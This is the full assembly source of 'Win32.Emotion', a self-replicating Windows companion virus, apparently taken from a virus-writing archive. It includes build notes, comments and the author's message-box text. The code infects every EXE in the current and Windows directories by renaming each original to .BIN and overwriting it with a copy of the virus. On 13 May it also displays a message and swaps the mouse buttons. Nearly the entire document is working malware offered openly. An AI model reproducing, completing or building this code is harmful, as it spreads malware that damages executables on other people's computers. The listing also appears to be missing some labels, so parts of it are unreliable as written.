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2020-10-11 03:07:43 +00:00
comment *
Win32.Emotion is a 4608 bytes direct action companion EXE virus. Infects
every file in current directory and Windows directory, when executed, by
moving the original EXE file to a BIN file by the same name and overwriting
the original EXE file with the virus.
Compile Win32.Emotion with Turbo Assembler v 5.0 by typing:
.model flat
; KERNEL32.dll
extrn ExitProcess:proc
extrn GetModuleHandleA:proc
extrn FindNextFileA:proc
extrn GetCommandLineA:proc
extrn FindFirstFileA:proc
extrn CopyFileA:proc
extrn GetSystemTime:proc
extrn GetWindowsDirectoryA:proc
extrn MoveFileA:proc
extrn SetCurrentDirectoryA:proc
extrn WinExec:proc
extrn GetModuleFileNameA:proc
; USER32.dll
extrn SwapMouseButton:proc
extrn MessageBoxA:proc
MAX_PATH equ 104h
NULL equ 00h
TRUE equ 01h
MB_ICONHAND equ 10h ; A stop-sign icon appears in the
; message box
SW_SHOWNORMAL equ 01h ; Activates and displays a window
FALSE equ 00h
wYear WORD ? ; Specifies the current year
wMonth WORD ? ; Specifies the current month;
; January = 1, February = 2, and so on
wDayOfWeek WORD ? ; Specifies the current day of the
; week
wDay WORD ? ; Specifies the current day of the
; month
wHour WORD ? ; Specifies the current hour
wMinute WORD ? ; Specifies the current minute
wSecond WORD ? ; Specifies the current second
wMilliseconds WORD ? ; Specifies the current millisecond
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
db ?
push NULL ; Get module handle of KERNEL32.dll
call GetModuleHandleA
push MAX_PATH ; Size of buffer, in characters
push offset cFilename ; Pointer to buffer for module path
push eax ; Handle to module to find filename
; for
call GetModuleFileNameA
jmp _FindFirstFileA
push MAX_PATH ; Size of directory buffer
push offset cBuffer ; Address of buffer for Windows
; directory
call GetWindowsDirectoryA
push offset szCurDir ; Address of name of new current
; directory
call SetCurrentDirectoryA
mov [set_current_directory],TRUE
jmp _FindFirstFileA
call GetCommandLineA
mov esi,eax ; ESI = pointer to the command-line
; string for the current process
lea edi,szCmdLine ; EDI = pointer to szCmdLine
stosb ; Store a byte of command-line
lodsb ; AL = a byte of command-line
or al,al ; End of command-line?
jnz move_commandline_loop ; Not zero? Jump to
; move_commandline_loop
mov eax,'.' ; Dot
lea edi,szCmdLine ; EDI = pointer to szCmdLine
mov ecx,MAX_PATH ; ECX = size of directory buffer
repne scasb ; Find the dot in the filename
mov dword ptr [edi],' nib' ; Change the extention of the filename
; to .BIN
mov word ptr [szCmdLine],' '
push offset SystemTime ; Address of system time structure
call GetSystemTime
cmp byte ptr [SystemTime.wMonth],05h
jne _WinExec ; May? Jump to _WinExec
cmp byte ptr [SystemTime.wDay],0dh
jne _WinExec ; 13th of May? Jump to _WinExec
push MB_ICONHAND ; A stop-sign icon appears in the
; message box
push offset szCaption ; Address of title of message box
push offset szText ; Address of text in message box
push NULL ; Message box has no owner window
call MessageBoxA
push TRUE ; Reverse buttons
call SwapMouseButton
push SW_SHOWNORMAL ; Activates and displays a window
push offset szCmdLine ; Address of command-line
call WinExec
push 00h ; Exit code for all threads
call ExitProcess
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
je function_failed ; Function failed? Jump to
; function_failed
lea edi,FindFileData ; EDI = pointer to FindFileData
lea esi,[edi+cFileName-WIN32_FIND_DATA]
push eax ; EAX = search handle
jmp move_filename
push edi ; EDI = pointer to FindFileData
lea edi,[edi+cFileName-WIN32_FIND_DATA]
mov ecx,0dh ; Store thirteen zeros
xor al,al ; Zero AL
rep stosb ; Store zero
lea edi,szNewFileName ; EDI = pointer to szNewFileName
mov ecx,0dh ; Store thirteen zeros
xor al,al ; Zero AL
rep stosb ; Store zero
pop edi ; EDI = pointer to FindFileData
pop eax ; EAX = search handle
push eax ; EAX = search handle
push edi ; Address of structure for data on
; found file
push eax ; Handle of search
call FindNextFileA
or eax,eax ; Function failed?
jz function_failed ; Zero? Jump to function_failed
lea edi,FindFileData ; EDI = pointer to FindFileData
lea esi,[edi+cFileName-WIN32_FIND_DATA]
jmp move_filename
cmp [set_current_directory],TRUE
je _GetCommandLineA ; Equal? Jump to _GetCommandLineA
jmp _GetWindowsDirectoryA
push edi ; EDI = pointer to FindFileData
lea si,[edi+cFileName-WIN32_FIND_DATA]
lea edi,szNewFileName ; EDI = pointer to szNewFileName
lodsb ; AL = a byte of command-line
stosb ; Store a byte of command-line
or al,al ; End of command-line?
jnz move_filename_loop ; Not zero? Jump to move_filename_loop
xor eax,eax ; Zero EAX
lea edi,szNewFileName ; EDI = pointer to szNewFileName
mov ecx,41h ; Search through sixty-five characters
repne scasb ; Find end of filename
mov dword ptr [edi-04h],'nib'
pop edi ; EDI = pointer to FindFileData
push offset szNewFileName ; Address of new name for the file
lea eax,[edi+cFileName-WIN32_FIND_DATA]
push eax ; Address of name of the existing file
call MoveFileA
push FALSE ; If file already exists, overwrite it
lea eax,[edi+cFileName-WIN32_FIND_DATA]
push eax ; Address of filename to copy to
lea eax,szExistingFileName ; EAX = pointer to szExistingFileName
push eax ; Address of name of an existing file
call CopyFileA
jmp _FindNextFileA
szFileName db '*.EXE',00h ; Name of file to search for
szCaption db 'w32.Emotion - By: Techno Phunk [TI]',00h
szText db 'A pool of emotions, beaten and abused.',0dh,0ah
db 'Who will swim in the stale waters? Not a one',0dh,0ah
db 'But many will scoff and destroy this pool with apathy',00h
cBuffer db MAX_PATH dup(00h)
; Buffer for Windows directory
szNewFileName db MAX_PATH dup(00h)
; New name for the file
cFilename db MAX_PATH dup(00h)
; Buffer for module path
SystemTime SYSTEMTIME <>
set_current_directory db FALSE
FindFileData WIN32_FIND_DATA <>
end code_begin